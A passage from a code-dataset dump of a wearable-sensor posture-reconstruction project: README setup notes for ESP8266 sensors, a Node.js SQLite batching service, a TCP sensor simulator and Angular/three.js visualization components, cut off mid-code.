air (OTA) firmeware update. Follow [this tutorial](https://randomnerdtutorials.com/esp8266-ota-updates-with-arduino-ide-over-the-air/) to see how to use OTA.\n\n### Sensor Calibration\nStart the server device and the data collection script first. Connect a sensor module with battery. The red led on the nodeMCU chip indicates power and the blue led indicates status. The power is first connected, you should see the blue led turns on. After the module is connected to an access point. The blue led will start blinking rapidly, indicating that the sensor is in calibration mode. 
Free style move the sensor for a few secounds, then hold still with the module facing up. You should see the blue led blinks less rapidly, indicating that it is sending the data.\n\n### Debugging using a laptop\nYou can use a laptop with wifi capability to debug the chip. To do that, you need to setup your laptop to run a wifi access point first. On Mac, if you also have ethernet cable connected, just open \"sharing\" and share the ethernet to wifi. If you don't have an ethernet connection, follow [this tutorial](http://www.laszlopusztai.net/2016/02/14/creating-a-wi-fi-access-point-on-os-x/) and share \"Loopback\" to wifi.\nUse `arp -a` to see connected devices\n\n\n"
},
{
"alpha_fraction": 0.6572472453117371,
"alphanum_fraction": 0.6823385953903198,
"avg_line_length": 46.18390655517578,
"blob_id": "d7b674615819de0d46221ab3cb916f8f12730dc6",
"content_id": "d9ab8d9cf6c5150afc43170d5b98d6fa26f65b16",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 4105,
"license_type": "no_license",
"max_line_length": 300,
"num_lines": 87,
"path": "/oriTrakHAR-master/sensorDataCollection/dataServer_streamming/prev_db_service/db_service_multirow_insert.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "'use strict'\nconst Promise = require('bluebird')\nconst db = require('sqlite')\nconst fs = require('fs')\nconst UPDATE_INTERVAL = 1000\nconst dbInit = fs.readFileSync('./dbInit.sql').toString()\nvar dbPromise = db.open('./userActivityData.db', {Promise})\ndbPromise = dbPromise.then(() => db.exec(dbInit))\n\nconst insertSensorData100HzQuery = 'INSERT INTO SensorData100Hz(server_id, sensor_id, sensor_timestamp, server_timestamp, quat_w, quat_x, quat_y, quat_z, gyro_x, gyro_y, gyro_z, lacc_x, lacc_y, lacc_z, acc_x, acc_y, acc_z) VALUES\\n'\nconst insertSensorData20HzQuery = 'INSERT INTO SensorData20Hz(server_id, sensor_id, sensor_timestamp, server_timestamp, mag_x, mag_y, mag_z) VALUES\\n'\nconst insertSensorData1HzQuery = 'INSERT INTO SensorData1Hz(server_id, sensor_id, sensor_timestamp, server_timestamp, temp) VALUES\\n'\nconst insertHealthQuery = 'INSERT INTO SensorFreq(server_id, sensor_id, server_timestamp, frequency) VALUES\\n'\nvar sensorData100HzBuf = ''\nvar sensorData20HzBuf = ''\nvar sensorData1HzBuf = ''\nvar healthBuff = ''\n\nfunction insertSensorData100Hz (serverId, sensorId, sensorTimestamp, serverTimestamp, data) {\n if (sensorData100HzBuf.length === 0) {\n sensorData100HzBuf = [sensorData100HzBuf, '(', [serverId, sensorId, sensorTimestamp, serverTimestamp, data.quat.w, data.quat.x, data.quat.y, data.quat.z, data.gyro.x, data.gyro.y, data.gyro.z, data.lacc.x, data.lacc.y, data.lacc.z, data.acc.x, data.acc.y, data.acc.z].join(', '), ')'].join('')\n } else {\n sensorData100HzBuf = [sensorData100HzBuf, ',\\n(', [serverId, sensorId, sensorTimestamp, serverTimestamp, data.quat.w, data.quat.x, data.quat.y, data.quat.z, data.gyro.x, data.gyro.y, data.gyro.z, data.lacc.x, data.lacc.y, data.lacc.z, data.acc.x, data.acc.y, data.acc.z].join(', '), ')'].join('')\n }\n}\n\nfunction insertSensorData20Hz (serverId, sensorId, sensorTimestamp, serverTimestamp, data) {\n if (sensorData20HzBuf.length === 0) {\n sensorData20HzBuf = [sensorData20HzBuf, '(', [serverId, sensorId, sensorTimestamp, serverTimestamp, data.mag.x, data.mag.y, data.mag.z].join(', '), ')'].join('')\n } else {\n sensorData20HzBuf = [sensorData20HzBuf, ',\\n(', [serverId, sensorId, sensorTimestamp, serverTimestamp, data.mag.x, data.mag.y, data.mag.z].join(', '), ')'].join('')\n }\n}\n\nfunction insertSensorData1Hz (serverId, sensorId, sensorTimestamp, serverTimestamp, data) {\n if (sensorData1HzBuf.length === 0) {\n sensorData1HzBuf = [sensorData1HzBuf, '(', [serverId, sensorId, sensorTimestamp, serverTimestamp, data.temp].join(', '), ')'].join('')\n } else {\n sensorData1HzBuf = [sensorData1HzBuf, ',\\n(', [serverId, sensorId, sensorTimestamp, serverTimestamp, data.temp].join(', '), ')'].join('')\n }\n}\nfunction insertHealth (serverId, sensorId, serverTimestamp, freq) {\n if (healthBuff.length === 0) {\n healthBuff = [healthBuff, '(', [serverId, sensorId, serverTimestamp, freq].join(', '), ')'].join('')\n } else {\n healthBuff = [healthBuff, ',\\n(', [serverId, sensorId, serverTimestamp, freq].join(', '), ')'].join('')\n }\n}\n\nsetInterval(() => {\n var query = ''\n if (sensorData100HzBuf.length > 0) {\n query = [query, insertSensorData100HzQuery, sensorData100HzBuf, ';\\n'].join('')\n }\n if (sensorData20HzBuf.length > 0) {\n query = [query, insertSensorData20HzQuery, sensorData20HzBuf, ';\\n'].join('')\n }\n if (sensorData1HzBuf.length > 0) {\n query = [query, insertSensorData1HzQuery, sensorData1HzBuf, ';\\n'].join('')\n }\n if (healthBuff.length > 0) {\n query = [query, insertHealthQuery, healthBuff, 
';\\n'].join('')\n }\n // console.log(query)\n if (query.length > 0) {\n // console.log('--------------------------')\n // console.log(query)\n dbPromise = dbPromise.then(() => {\n db.exec(query)\n query = null\n })\n .catch(e => {\n console.log(e)\n })\n }\n sensorData100HzBuf = ''\n sensorData20HzBuf = ''\n sensorData1HzBuf = ''\n healthBuff = ''\n}, UPDATE_INTERVAL)\n\nmodule.exports = {\n insertSensorData100Hz: insertSensorData100Hz,\n insertSensorData20Hz: insertSensorData20Hz,\n insertSensorData1Hz: insertSensorData1Hz,\n insertHealth: insertHealth\n}\n"
},
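The multirow service above buffers rows as strings and flushes one multi-row `INSERT ... VALUES (...), (...)` per `UPDATE_INTERVAL`, trading per-row latency for far fewer statements. A reduced sketch of that buffer-and-flush idea for the 1 Hz table follows; values are interpolated directly into the SQL, as in the original, which is only acceptable for trusted numeric sensor data, and the sample rows are made up.

```js
// Queue rows in memory, then emit one multi-row INSERT per interval.
const rows = []

function queueSample (serverId, sensorId, sensorTs, serverTs, temp) {
  rows.push(`(${serverId}, ${sensorId}, ${sensorTs}, ${serverTs}, ${temp})`)
}

setInterval(() => {
  if (rows.length === 0) return
  const query =
    'INSERT INTO SensorData1Hz(server_id, sensor_id, sensor_timestamp, server_timestamp, temp) VALUES\n' +
    rows.join(',\n') + ';'
  rows.length = 0 // reset the buffer for the next window
  console.log(query) // the real service hands this string to db.exec(query)
}, 1000)

queueSample(1, 11111000, 123456, Date.now(), 27)
queueSample(1, 11111000, 123466, Date.now(), 28)
```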
{
"alpha_fraction": 0.6600768566131592,
"alphanum_fraction": 0.6694124341011047,
"avg_line_length": 23.945205688476562,
"blob_id": "72b9bf358010d495cb5fbb041eac36fb4bdfdccf",
"content_id": "8a90b8f9cdda307a752ffd0cd6bca63adf244e70",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 1821,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 73,
"path": "/oriTrakHAR-master/rawDataVis/src/app/components/left-3d-vis/left-3d-vis.component.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Component, OnInit } from '@angular/core';\nimport { SockService } from '../../services/sock.service';\nimport { DataModelService } from '../../services/data-model.service';\nimport { Observable } from 'rxjs/Observable';\n@Component({\n selector: 'app-left-3d-vis',\n templateUrl: './left-3d-vis.component.html',\n styleUrls: ['./left-3d-vis.component.css']\n})\nexport class Left3dVisComponent implements OnInit {\n public status;\n public reconstruction_ratio = 0.5;\n public axisNames = ['north', 'up', 'East'];\n public histAxisNames = ['Front', 'up', 'Right'];\n public selectedRatio = 1;\n\n public histStartTime: Date;\n public histEndTime: Date;\n public availableRatio = [1, 2, 4, 8, 16];\n constructor(private dataModel: DataModelService, private sock: SockService) {\n this.status = dataModel.status;\n\n }\n\n ngOnInit() {\n\n }\n\n public objToArray(obj) {\n return Object.keys(obj);\n }\n public play() {\n this.status.playing = true;\n this.sock.play(this.status.animationStartTime.valueOf(), this.status.animationEndTime.valueOf(), this.selectedRatio, this.status.selectedDate);\n }\n public stop() {\n this.status.playing = false;\n this.sock.stop();\n }\n\n public selectRatio(ratio) {\n this.selectedRatio = ratio;\n }\n\n public selectHistSource(histSource) {\n this.status.selectedHistSource = histSource;\n this.updateHist();\n }\n\n public getPlayingTime() {\n if (this.status.playingTime) {\n return this.status.playingTime.toString().slice(15, 25);\n }\n }\n\n public updateHist() {\n this.sock.updateHist();\n }\n\n public pause() {\n this.sock.pause();\n this.status.playing = false;\n }\n\n public getAxisNameForHist() {\n if (this.status.selectedHistSource === 'Torso Orient') {\n return this.axisNames;\n } else {\n return this.histAxisNames;\n }\n }\n\n}\n"
},
{
"alpha_fraction": 0.5164399147033691,
"alphanum_fraction": 0.6643990874290466,
"avg_line_length": 30.5,
"blob_id": "aad3be3362f07f5f059e9701cc1544bcd27026e4",
"content_id": "b4ac78e172eb267792b97474b39eb20238c83ccb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1764,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 56,
"path": "/oriTrakHAR-master/sensorDataCollection/sensorSimulator/sensorSimulator.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "const net = require('net')\nconst client = new net.Socket()\n\nconst PORT = 9000\nconst ADDR = '127.0.0.1' // change this to the router address of android wifi hotspot\nvar offset100 = 0\nvar offset20 = 0\nvar offset1 = 0\n\nclient.connect(PORT, ADDR, () => {\n console.log('connect...')\n setInterval(() => {\n var buffer = Buffer.alloc(60)\n buffer.writeUInt32LE(11111000, 0)\n buffer.writeUInt32LE(new Date().valueOf() - 1517381000000, 4)\n buffer.writeFloatLE(0.1 + offset100, 8)\n buffer.writeFloatLE(0.2 + offset100, 12)\n buffer.writeFloatLE(0.3 + offset100, 16)\n buffer.writeFloatLE(0.4 + offset100, 20)\n buffer.writeFloatLE(1.1 + offset100, 24)\n buffer.writeFloatLE(1.2 + offset100, 28)\n buffer.writeFloatLE(1.3 + offset100, 32)\n buffer.writeFloatLE(2.1 + offset100, 36)\n buffer.writeFloatLE(2.2 + offset100, 40)\n buffer.writeFloatLE(2.3 + offset100, 44)\n buffer.writeFloatLE(3.1 + offset100, 48)\n buffer.writeFloatLE(3.2 + offset100, 52)\n buffer.writeFloatLE(3.3 + offset100, 56)\n client.write(buffer)\n offset100 += 0.000000001\n }, 10)\n\n setInterval(() => {\n var buffer = Buffer.alloc(20)\n buffer.writeUInt32LE(11111000, 0)\n buffer.writeUInt32LE(new Date().valueOf() - 1517381000000, 4)\n buffer.writeFloatLE(4.1 + offset20, 8)\n buffer.writeFloatLE(4.2 + offset20, 12)\n buffer.writeFloatLE(4.3 + offset20, 16)\n client.write(buffer)\n offset20 += 0.000000001\n }, 50)\n\n setInterval(() => {\n var buffer = Buffer.alloc(12)\n buffer.writeUInt32LE(11111000, 0)\n buffer.writeUInt32LE(new Date().valueOf() - 1517381000000, 4)\n buffer.writeFloatLE(8.1 + offset1, 8)\n client.write(buffer)\n offset1 += 0.000000001\n }, 1000)\n\n client.on('error', (e) => {\n console.log(e)\n })\n})\n"
},
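The simulator writes fixed-size little-endian frames: the 60-byte 100 Hz packet is a uint32 sensor id, a uint32 millisecond timestamp, then 13 float32 values (quaternion w/x/y/z, gyro, linear acceleration, accelerometer). Below is a sketch of how a receiver such as `virtualReciever.js` might decode one frame with Node's `Buffer` API; the field layout is inferred from the writer above, and a real TCP reader may need reframing logic since packets can coalesce.

```js
// Decode one 60-byte 100 Hz frame: uint32 id | uint32 timestamp |
// 13 x float32 (quat w,x,y,z, gyro xyz, lacc xyz, acc xyz), little-endian.
function decode100HzFrame (buf) {
  const f = []
  for (let off = 8; off < 60; off += 4) f.push(buf.readFloatLE(off))
  return {
    id: buf.readUInt32LE(0),
    timestamp: buf.readUInt32LE(4),
    quat: { w: f[0], x: f[1], y: f[2], z: f[3] },
    gyro: { x: f[4], y: f[5], z: f[6] },
    lacc: { x: f[7], y: f[8], z: f[9] },
    acc: { x: f[10], y: f[11], z: f[12] }
  }
}

// e.g. inside processData(data) in virtualReciever.js:
// if (data.length === 60) console.log(decode100HzFrame(data))
```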
{
"alpha_fraction": 0.671640932559967,
"alphanum_fraction": 0.6891971230506897,
"avg_line_length": 38.464202880859375,
"blob_id": "ae594ab3c68551152a4fc125113f23902970cf1b",
"content_id": "00aefd56387bd9b40931acde290fb5eb5d880032",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 17088,
"license_type": "no_license",
"max_line_length": 162,
"num_lines": 433,
"path": "/oriTrakHAR-master/robotVisualizationRealtime/src/app/components/stick-figure/stick-figure.component.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { Component, OnInit, AfterViewInit, Input, OnChanges } from '@angular/core';\nimport * as THREE from 'three';\ndeclare function require(name:string);\nvar OrbitControls = require('three-orbit-controls')(THREE);\nvar STLLoader = require('three-stl-loader')(THREE);\nvar loader = new STLLoader();\nloader.loadPromise = function (path) {\n return new Promise((resolve, reject) => {\n loader.load(path, geometry => {\n resolve(geometry)\n })\n }).catch(e => {\n console.log(e)\n })\n}\n\n@Component({\n moduleId: module.id,\n selector: 'app-stick-figure',\n templateUrl: './stick-figure.component.html',\n styleUrls: ['./stick-figure.component.css']\n})\nexport class StickFigureComponent implements OnInit {\n @Input() angleData\n @Input() name: string;\n @Input() container: HTMLElement;\n @Input() axisNames: string[];\n\n camera: any;\n scene: any;\n renderer: any;\n geometry: any;\n material: any;\n mesh: any;\n rendererHeight = 800;\n rendererWidth = 800;\n WIDTH_FACTOR = 0.49;\n HEIGHT_FACTOR = 0.8;\n AXIS_LENGTH = 430;\n TORSO_LENGTH = 260;\n SHOULDER_Y_POS = 180;\n SHOULDER_Z_POS = 100;\n SHOULDER_X_POS = -30;\n UPPER_ARM_LENGTH = 105;\n NECK_LENGTH = this.TORSO_LENGTH - this.SHOULDER_Y_POS;\n LOWER_ARM_Y_OFFSET = -10;\n ARM_LENGTH = this.AXIS_LENGTH / 4\n\n TRACE_SEGMENTS = 25;\n objectDragged = 'none';\n mousePos = {x: 0, y: 0};\n cameraPos = {x: 0.425, y: 0.595};\n vectorObject: any = new THREE.Line();\n\n lineTorso: any;\n lineLeftUpperArm: any;\n lineRightUpperArm: any;\n\n meshTorso: THREE.Mesh;\n meshLeftUpperArm: THREE.Mesh;\n meshLeftLowerArm: THREE.Mesh;\n meshRightUpperArm: THREE.Mesh;\n meshRightLowerArm: THREE.Mesh;\n meshHead: THREE.Mesh;\n\n vectorQuaternion: any = new THREE.Quaternion();\n rotationAxis: any = new THREE.Vector3(0, 1, 0);\n axisXName: any;\n axisYName: any;\n axisZName: any;\n // eulerOrder = 'XYZ';\n eulerOrder = 'YZX';\n\n showAxis = true;\n // rotationAxisObject: any = new THREE.Line();\n\n\n constructor() { }\n\n ngOnInit() {\n const aspectRatio = 1;\n this.camera = new THREE.PerspectiveCamera(75, aspectRatio, 1, 10000);\n this.turnCamera();\n\n this.scene = new THREE.Scene();\n var light = new THREE.HemisphereLight( 0xffffee, 0x080820, 1 );\n this.scene.add( light );\n\n\n this.initGrid();\n this.initAxes();\n this.initAxesNames();\n // this.initLineTrace();\n // this.initRotationAxis();\n\n\n\n this.renderer = new THREE.WebGLRenderer({ alpha: true , antialias: true});\n this.renderer.setSize(this.rendererWidth, this.rendererHeight);\n this.renderer.setClearColor( 0xffffff, 1 );\n this.container.appendChild(this.renderer.domElement);\n this.container.addEventListener('mousemove', this.handleMouseMove.bind(this), false);\n this.container.addEventListener('mousedown', this.handleMouseDown.bind(this), false);\n this.container.addEventListener('mouseup', this.handleMouseUp.bind(this), false);\n this.container.addEventListener('touchmove', this.handleTouchMove.bind(this), false);\n this.container.addEventListener('touchstart', this.handleTouchStart.bind(this), false);\n this.container.addEventListener('touchend', this.handleTouchEnd.bind(this), false);\n // this.updateRotationAxis();\n\n // this.scene.add(this.rotationAxisObject);\n\n // vectorQuaternion.normalize();\n // this.renderer.render(this.scene, this.camera);\n // this.animate(this.angleData);\n\n this.initVector().then(() => {\n this.updateVectorVisuals();\n this.renderer.render(this.scene, this.camera);\n this.animate(this.angleData);\n })\n }\n\n\n animate(angleData) {\n // 
this.vectorQuaternion.x = angleData.quaternion.x;\n // this.vectorQuaternion.w = angleData.quaternion.w;\n // this.vectorQuaternion.y = angleData.quaternion.y;\n // this.vectorQuaternion.z = angleData.quaternion.z;\n\n // this.updateRotationAxis();\n this.updateVectorVisuals();\n this.renderer.render(this.scene, this.camera);\n this.updateAxesNames();\n setTimeout(() => {\n this.animate(angleData);\n } , 20);\n }\n\n setQuat(target, val) {\n target.quaternion.w = val.quaternion.w\n target.quaternion.x = val.quaternion.x\n target.quaternion.y = val.quaternion.y\n target.quaternion.z = val.quaternion.z\n }\n\n updateVectorVisuals() {\n this.setQuat(this.lineTorso, this.angleData.torso)\n this.setQuat(this.meshTorso, this.angleData.torso)\n var orig_torsoVector = this.lineTorso.geometry.vertices[4].clone()\n var curTorsoVector = new THREE.Vector3(orig_torsoVector.x, orig_torsoVector.y, orig_torsoVector.z).applyQuaternion(this.lineTorso.quaternion)\n this.meshHead.position.set(curTorsoVector.x, curTorsoVector.y, curTorsoVector.z)\n this.setQuat(this.meshHead, this.angleData.head)\n\n var upperRightArmVector = this.lineTorso.geometry.vertices[3].clone()\n var curRightUpperArmVector = new THREE.Vector3(upperRightArmVector.x, upperRightArmVector.y, upperRightArmVector.z).applyQuaternion(this.lineTorso.quaternion)\n this.lineRightUpperArm.position.set(curRightUpperArmVector.x, curRightUpperArmVector.y, curRightUpperArmVector.z)\n this.meshRightUpperArm.position.set(curRightUpperArmVector.x, curRightUpperArmVector.y, curRightUpperArmVector.z)\n this.setQuat(this.lineRightUpperArm, this.angleData.rightUpper)\n this.setQuat(this.meshRightUpperArm, this.angleData.rightUpper)\n\n\n curRightUpperArmVector.add(this.lineRightUpperArm.geometry.vertices[1].clone().applyQuaternion(this.lineRightUpperArm.quaternion))\n this.meshRightLowerArm.position.set(curRightUpperArmVector.x, curRightUpperArmVector.y, curRightUpperArmVector.z)\n this.setQuat(this.meshRightLowerArm, this.angleData.rightLower)\n\n var upperLeftArmVector = this.lineTorso.geometry.vertices[2].clone()\n var curLeftUpperArmVector = new THREE.Vector3(upperLeftArmVector.x, upperLeftArmVector.y, upperLeftArmVector.z).applyQuaternion(this.lineTorso.quaternion)\n this.lineLeftUpperArm.position.set(curLeftUpperArmVector.x, curLeftUpperArmVector.y, curLeftUpperArmVector.z)\n this.meshLeftUpperArm.position.set(curLeftUpperArmVector.x, curLeftUpperArmVector.y, curLeftUpperArmVector.z)\n this.setQuat(this.lineLeftUpperArm, this.angleData.leftUpper)\n this.setQuat(this.meshLeftUpperArm, this.angleData.leftUpper)\n\n\n curLeftUpperArmVector.add(this.lineLeftUpperArm.geometry.vertices[1].clone().applyQuaternion(this.lineLeftUpperArm.quaternion))\n this.meshLeftLowerArm.position.set(curLeftUpperArmVector.x, curLeftUpperArmVector.y, curLeftUpperArmVector.z)\n this.setQuat(this.meshLeftLowerArm, this.angleData.leftLower)\n\n }\n\n turnCamera() {\n this.camera.position.x = Math.sin(this.cameraPos.x) * 1000 * Math.cos(this.cameraPos.y);\n this.camera.position.z = Math.cos(this.cameraPos.x) * 1000 * Math.cos(this.cameraPos.y);\n this.camera.position.y = Math.sin(this.cameraPos.y) * 1000;\n this.camera.lookAt(new THREE.Vector3(0, 0, 0));\n }\n\n initGrid() {\n const GRID_SEGMENT_COUNT = 5;\n const gridLineMat = new THREE.LineBasicMaterial({color: 0xDDDDDD});\n const gridLineMatThick = new THREE.LineBasicMaterial({color: 0xAAAAAA, linewidth: 2});\n\n for (let i = -GRID_SEGMENT_COUNT; i <= GRID_SEGMENT_COUNT; i++) {\n const dist = this.AXIS_LENGTH * i / 
GRID_SEGMENT_COUNT;\n const gridLineGeomX = new THREE.Geometry();\n const gridLineGeomY = new THREE.Geometry();\n\n if (i === 0) {\n gridLineGeomX.vertices.push(new THREE.Vector3(dist, 0, -this.AXIS_LENGTH));\n gridLineGeomX.vertices.push(new THREE.Vector3(dist, 0, 0));\n\n gridLineGeomY.vertices.push(new THREE.Vector3(-this.AXIS_LENGTH, 0, dist));\n gridLineGeomY.vertices.push(new THREE.Vector3( 0, 0, dist));\n\n this.scene.add(new THREE.Line(gridLineGeomX, gridLineMatThick));\n this.scene.add(new THREE.Line(gridLineGeomY, gridLineMatThick));\n } else {\n gridLineGeomX.vertices.push(new THREE.Vector3(dist, 0, -this.AXIS_LENGTH));\n gridLineGeomX.vertices.push(new THREE.Vector3(dist, 0, this.AXIS_LENGTH));\n\n gridLineGeomY.vertices.push(new THREE.Vector3(-this.AXIS_LENGTH, 0, dist));\n gridLineGeomY.vertices.push(new THREE.Vector3( this.AXIS_LENGTH, 0, dist));\n\n this.scene.add(new THREE.Line(gridLineGeomX, gridLineMat));\n this.scene.add(new THREE.Line(gridLineGeomY, gridLineMat));\n }\n }\n }\n\n initAxes() {\n const xAxisMat = new THREE.LineBasicMaterial({color: 0xff0000, linewidth: 2});\n const xAxisGeom = new THREE.Geometry();\n xAxisGeom.vertices.push(new THREE.Vector3(0, 0, 0));\n xAxisGeom.vertices.push(new THREE.Vector3(this.AXIS_LENGTH, 0, 0));\n const xAxis = new THREE.Line(xAxisGeom, xAxisMat);\n this.scene.add(xAxis);\n\n const yAxisMat = new THREE.LineBasicMaterial({color: 0x00cc00, linewidth: 2});\n const yAxisGeom = new THREE.Geometry();\n yAxisGeom.vertices.push(new THREE.Vector3(0, 0, 0));\n yAxisGeom.vertices.push(new THREE.Vector3(0, this.AXIS_LENGTH, 0));\n const yAxis = new THREE.Line(yAxisGeom, yAxisMat);\n this.scene.add(yAxis);\n\n const zAxisMat = new THREE.LineBasicMaterial({color: 0x0000ff, linewidth: 2});\n const zAxisGeom = new THREE.Geometry();\n zAxisGeom.vertices.push(new THREE.Vector3(0, 0, 0));\n zAxisGeom.vertices.push(new THREE.Vector3(0, 0, this.AXIS_LENGTH));\n const zAxis = new THREE.Line(zAxisGeom, zAxisMat);\n this.scene.add(zAxis);\n }\n\n initAxesNames() {\n const objects = new Array(3);\n const colors = ['#ff0000', '#00cc00', '#0000ff'];\n for (let i = 0, len = objects.length; i < len; i++) {\n objects[i] = document.createElement('div');\n objects[i].innerHTML = this.axisNames[i];\n objects[i].style.position = 'absolute';\n objects[i].style.transform = 'translateX(-50%) translateY(-50%)';\n objects[i].style.color = colors[i];\n document.body.appendChild(objects[i]);\n }\n this.axisXName = objects[0];\n this.axisYName = objects[1];\n this.axisZName = objects[2];\n }\n\n initVector() {\n const torsoMat = new THREE.LineBasicMaterial({color: 0x000000, linewidth: 10})\n const torsoGeom = new THREE.Geometry();\n torsoGeom.vertices.push(new THREE.Vector3(0, 0, 0));\n const torsoVectorStandard = new THREE.Vector3(0, this.SHOULDER_Y_POS, 0);\n const shoulderVectorLeft = new THREE.Vector3(this.SHOULDER_X_POS, 0, -this.SHOULDER_Z_POS)\n const shoulderVectorRight = new THREE.Vector3(this.SHOULDER_X_POS, 0, this.SHOULDER_Z_POS)\n const neck = new THREE.Vector3(0, this.NECK_LENGTH, 0)\n\n shoulderVectorLeft.add(torsoVectorStandard)\n shoulderVectorRight.add(torsoVectorStandard)\n neck.add(torsoVectorStandard)\n\n torsoGeom.vertices.push(torsoVectorStandard)\n torsoGeom.vertices.push(shoulderVectorLeft)\n torsoGeom.vertices.push(shoulderVectorRight)\n torsoGeom.vertices.push(neck)\n this.lineTorso = new THREE.Line(torsoGeom, torsoMat)\n // this.scene.add(new THREE.Line(torsoGeom, torsoMat))\n\n // const headGeom = new THREE.Geometry();\n // const headVector 
= new THREE.Vector3(0, this.SHOULDER_Y_POS + this.NECK_LENGTH, 0);\n // headGeom.vertices.push(new THREE.Vector3(0, 0, 0))\n // headGeom.vertices.push(headVector)\n // this.lineHead = new THREE.Line(headGeom, torsoMat)\n\n const rightUpperArmGeom = new THREE.Geometry();\n const rightUpperArmVector = new THREE.Vector3(this.UPPER_ARM_LENGTH - this.SHOULDER_X_POS, this.LOWER_ARM_Y_OFFSET, 18);\n rightUpperArmGeom.vertices.push(new THREE.Vector3(0, 0, 0))\n rightUpperArmGeom.vertices.push(rightUpperArmVector)\n this.lineRightUpperArm = new THREE.Line(rightUpperArmGeom, torsoMat)\n\n const leftUpperArmGeom = new THREE.Geometry();\n const leftUpperArmVector = new THREE.Vector3(this.UPPER_ARM_LENGTH - this.SHOULDER_X_POS, this.LOWER_ARM_Y_OFFSET, -18);\n leftUpperArmGeom.vertices.push(new THREE.Vector3(0, 0, 0))\n leftUpperArmGeom.vertices.push(leftUpperArmVector)\n this.lineLeftUpperArm = new THREE.Line(leftUpperArmGeom, torsoMat)\n\n return loader.loadPromise('./assets/torso.stl')\n .then(geometry => {\n var material = new THREE.MeshPhongMaterial( { color: 0xBEBEBE } );\n var mesh = new THREE.Mesh(geometry, material);\n this.scene.add(mesh);\n this.meshTorso = mesh\n return loader.loadPromise('./assets/Head.stl');\n })\n .then(geometry => {\n var material = new THREE.MeshPhongMaterial( { color: 0xBEBEBE } );\n var mesh = new THREE.Mesh(geometry, material);\n this.scene.add(mesh);\n this.meshHead = mesh\n mesh.position.set(0, this.TORSO_LENGTH, 0);\n return loader.loadPromise('./assets/Left_Upper_Arm.stl');\n })\n .then(geometry => {\n var material = new THREE.MeshPhongMaterial( { color: 0xBEBEBE } );\n var mesh = new THREE.Mesh(geometry, material);\n this.scene.add(mesh);\n mesh.position.set(this.SHOULDER_X_POS, this.SHOULDER_Y_POS, -this.SHOULDER_Z_POS);\n this.meshLeftUpperArm = mesh\n return loader.loadPromise('./assets/Right_Upper_Arm.stl');\n })\n .then(geometry => {\n var material = new THREE.MeshPhongMaterial( { color: 0xBEBEBE } );\n var mesh = new THREE.Mesh(geometry, material);\n this.scene.add(mesh);\n mesh.position.set(this.SHOULDER_X_POS, this.SHOULDER_Y_POS, this.SHOULDER_Z_POS);\n this.meshRightUpperArm = mesh\n return loader.loadPromise('./assets/Left_Lower_Arm.stl');\n })\n .then(geometry => {\n var material = new THREE.MeshPhongMaterial( { color: 0xFFD000 } );\n var mesh = new THREE.Mesh(geometry, material);\n this.scene.add(mesh);\n mesh.position.set(this.UPPER_ARM_LENGTH, this.SHOULDER_Y_POS + this.LOWER_ARM_Y_OFFSET, -118);\n this.meshLeftLowerArm = mesh\n return loader.loadPromise('./assets/Right_Lower_Arm.stl');\n })\n .then(geometry => {\n var material = new THREE.MeshPhongMaterial( { color: 0xFFD000 } );\n var mesh = new THREE.Mesh(geometry, material);\n this.scene.add(mesh);\n this.meshRightLowerArm = mesh\n mesh.position.set(this.UPPER_ARM_LENGTH, this.SHOULDER_Y_POS + this.LOWER_ARM_Y_OFFSET, 118);\n })\n\n }\n\n handlePointerMove(x, y) {\n const mouseDiffX = x - this.mousePos.x;\n const mouseDiffY = y - this.mousePos.y;\n this.mousePos = {x: x, y: y};\n if (this.objectDragged === 'scene') {\n this.cameraPos.x -= mouseDiffX / 200;\n this.cameraPos.y += mouseDiffY / 200;\n this.cameraPos.y = Math.min(this.cameraPos.y, 3.1415926 / 2);\n this.cameraPos.y = Math.max(this.cameraPos.y, -3.1415926 / 2);\n this.turnCamera();\n }\n }\n\n handleTouchMove(event) {\n if (this.objectDragged !== 'none') {\n event.preventDefault();\n }\n this.handlePointerMove(event.touches[0].clientX, event.touches[0].clientY);\n }\n\n handleMouseMove(event) {\n if (this.objectDragged !== 'none') 
{\n event.preventDefault();\n }\n this.handlePointerMove(event.clientX, event.clientY);\n }\n\n\n handleTouchStart(event) {\n this.handlePointerStart(event.touches[0].clientX, event.touches[0].clientY);\n }\n handleMouseDown(event) {\n this.handlePointerStart(event.clientX, event.clientY);\n }\n\n handlePointerStart(x, y) {\n this.mousePos = {x: x, y: y};\n const rect = this.renderer.domElement.getBoundingClientRect();\n if (this.mousePos.x >= rect.left\n && this.mousePos.x <= rect.left + this.rendererWidth\n && this.mousePos.y >= rect.top\n && this.mousePos.y <= rect.top + this.rendererHeight && this.objectDragged === 'none') {\n this.objectDragged = 'scene';\n }\n }\n\n handleTouchEnd(event) {\n this.objectDragged = 'none';\n }\n handleMouseUp(event) {\n this.objectDragged = 'none';\n }\n\n // updateRotationAxis() {\n // const theta = Math.acos(this.vectorQuaternion.w) * 2;\n // const sin = Math.sin(theta / 2);\n // if (sin >= 0.01 || sin <= -0.01) {\n // // console.log(quatY + \" \"+ quatZ + \" \"+ sin)\n // this.rotationAxis.x = this.vectorQuaternion.x / sin;\n // this.rotationAxis.y = this.vectorQuaternion.y / sin;\n // this.rotationAxis.z = this.vectorQuaternion.z / sin;\n // this.rotationAxis.normalize();\n // }\n // }\n\n toXYCoords(pos) {\n const sitetop = window.pageYOffset || document.documentElement.scrollTop;\n const siteleft = window.pageXOffset || document.documentElement.scrollLeft;\n const vector = pos.clone().project(this.camera);\n const rect = this.renderer.domElement.getBoundingClientRect();\n const vector2 = new THREE.Vector3(0, 0, 0);\n vector2.x = siteleft + rect.left + ( vector.x + 1) / 2 * (rect.right - rect.left);\n vector2.y = sitetop + rect.top + (-vector.y + 1) / 2 * (rect.bottom - rect.top);\n return vector2;\n }\n\n updateAxesNames() {\n const distance = this.AXIS_LENGTH * 1.1;\n const vectors = [new 